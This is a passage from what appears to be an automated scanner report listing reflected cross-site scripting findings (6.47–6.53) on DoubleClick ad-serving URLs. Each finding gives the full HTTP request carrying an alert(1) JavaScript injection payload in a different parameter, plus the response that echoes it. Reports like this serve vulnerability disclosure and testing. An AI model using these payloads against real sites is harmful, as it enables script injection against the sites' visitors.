User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:50:41 GMT
Content-Length: 9287

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340c1445"-alert(1)-"98a4c2b7cc0&crID=110787&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer
...[SNIP]...

6.47. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [crID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.684

Issue detail

The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e83d"-alert(1)-"f2aef3fa5b7 was submitted in the crID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.684;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bdd3d96d5de90549c%3B12fb0be7129,0%3B%3B%3B1383521841,yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAKXG-sC8BAAAAAAAAADFjYTQ4NGNjLTc0YmEtMTFlMC1hZDg3LTAwMWIyNDc4M2JjOAA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=1107875e83d"-alert(1)-"f2aef3fa5b7&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340361? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBuXyB.4sHClCQE2nLULjPiaSFWBRhOjldZdiMAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D518457643%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,1ca484cc-74ba-11e0-ad87-001b24783bc8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:50:54 GMT
Content-Length: 9287

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
inion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=1107875e83d"-alert(1)-"f2aef3fa5b7&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%
...[SNIP]...

6.48. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [partnerID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.684

Issue detail

The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79bb7"-alert(1)-"19c0f79625f was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.684;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bdd3d96d5de90549c%3B12fb0be7129,0%3B%3B%3B1383521841,yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAKXG-sC8BAAAAAAAAADFjYTQ4NGNjLTc0YmEtMTFlMC1hZDg3LTAwMWIyNDc4M2JjOAA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=110787&pubICode=1662910&pub=256078&partnerID=979bb7"-alert(1)-"19c0f79625f&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340361? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBuXyB.4sHClCQE2nLULjPiaSFWBRhOjldZdiMAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D518457643%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,1ca484cc-74ba-11e0-ad87-001b24783bc8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:28 GMT
Content-Length: 9287

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
emporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=110787&pubICode=1662910&pub=256078&partnerID=979bb7"-alert(1)-"19c0f79625f&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=https%3a%2f%2
...[SNIP]...

6.49. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [pub parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.684

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd56c"-alert(1)-"d3ec9aaf18e was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.684;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bdd3d96d5de90549c%3B12fb0be7129,0%3B%3B%3B1383521841,yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAKXG-sC8BAAAAAAAAADFjYTQ4NGNjLTc0YmEtMTFlMC1hZDg3LTAwMWIyNDc4M2JjOAA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=110787&pubICode=1662910&pub=256078cd56c"-alert(1)-"d3ec9aaf18e&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340361? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBuXyB.4sHClCQE2nLULjPiaSFWBRhOjldZdiMAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D518457643%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,1ca484cc-74ba-11e0-ad87-001b24783bc8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:18 GMT
Content-Length: 9287

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
engreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=110787&pubICode=1662910&pub=256078cd56c"-alert(1)-"d3ec9aaf18e&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=h
...[SNIP]...

6.50. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [pubICode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.684

Issue detail

The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a033"-alert(1)-"9d0261df748 was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.684;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bdd3d96d5de90549c%3B12fb0be7129,0%3B%3B%3B1383521841,yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAKXG-sC8BAAAAAAAAADFjYTQ4NGNjLTc0YmEtMTFlMC1hZDg3LTAwMWIyNDc4M2JjOAA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=110787&pubICode=16629107a033"-alert(1)-"9d0261df748&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340361? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBuXyB.4sHClCQE2nLULjPiaSFWBRhOjldZdiMAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D518457643%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,1ca484cc-74ba-11e0-ad87-001b24783bc8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:08 GMT
Content-Length: 9287

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=110787&pubICode=16629107a033"-alert(1)-"9d0261df748&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&re
...[SNIP]...

6.51. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.684

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9511b"-alert(1)-"27fa9528383 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.684;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bdd3d96d5de90549c%3B12fb0be7129,0%3B%3B%3B1383521841,yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAKXG-sC8BAAAAAAAAADFjYTQ4NGNjLTc0YmEtMTFlMC1hZDg3LTAwMWIyNDc4M2JjOAA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-1107879511b"-alert(1)-"27fa9528383&campID=80340&crID=110787&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340361? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBuXyB.4sHClCQE2nLULjPiaSFWBRhOjldZdiMAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D518457643%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,1ca484cc-74ba-11e0-ad87-001b24783bc8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:50:28 GMT
Content-Length: 9287

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-1107879511b"-alert(1)-"27fa9528383&campID=80340&crID=110787&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2
...[SNIP]...

6.52. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.684

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d79bd"-alert(1)-"cf2b07c19b1 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.684;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bdd3d96d5de90549c%3B12fb0be7129,0%3B%3B%3B1383521841,yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAKXG-sC8BAAAAAAAAADFjYTQ4NGNjLTc0YmEtMTFlMC1hZDg3LTAwMWIyNDc4M2JjOAA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=110787&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtmld79bd"-alert(1)-"cf2b07c19b1&redirectURL=;ord=1304340361? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBuXyB.4sHClCQE2nLULjPiaSFWBRhOjldZdiMAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D518457643%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,1ca484cc-74ba-11e0-ad87-001b24783bc8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:38 GMT
Content-Length: 9287

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtmld79bd"-alert(1)-"cf2b07c19b1&redirectURL=https%3a%2f%2fwww.thinkorswim.com/tos/suiteFreedom/Asterplosion.tos%3Fa%3DIVM%26%26cid%3DGENRET%3B877237%3B62579852%3B239944841%3B39988934");
var fscUrl = url;
var fscUrlClickTagFound =
...[SNIP]...

6.53. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [campID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.687

Issue detail

The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6cf3"-alert(1)-"1cadb0e3ce6 was submitted in the campID parameter. This input was echoed unmodified in the application's response.

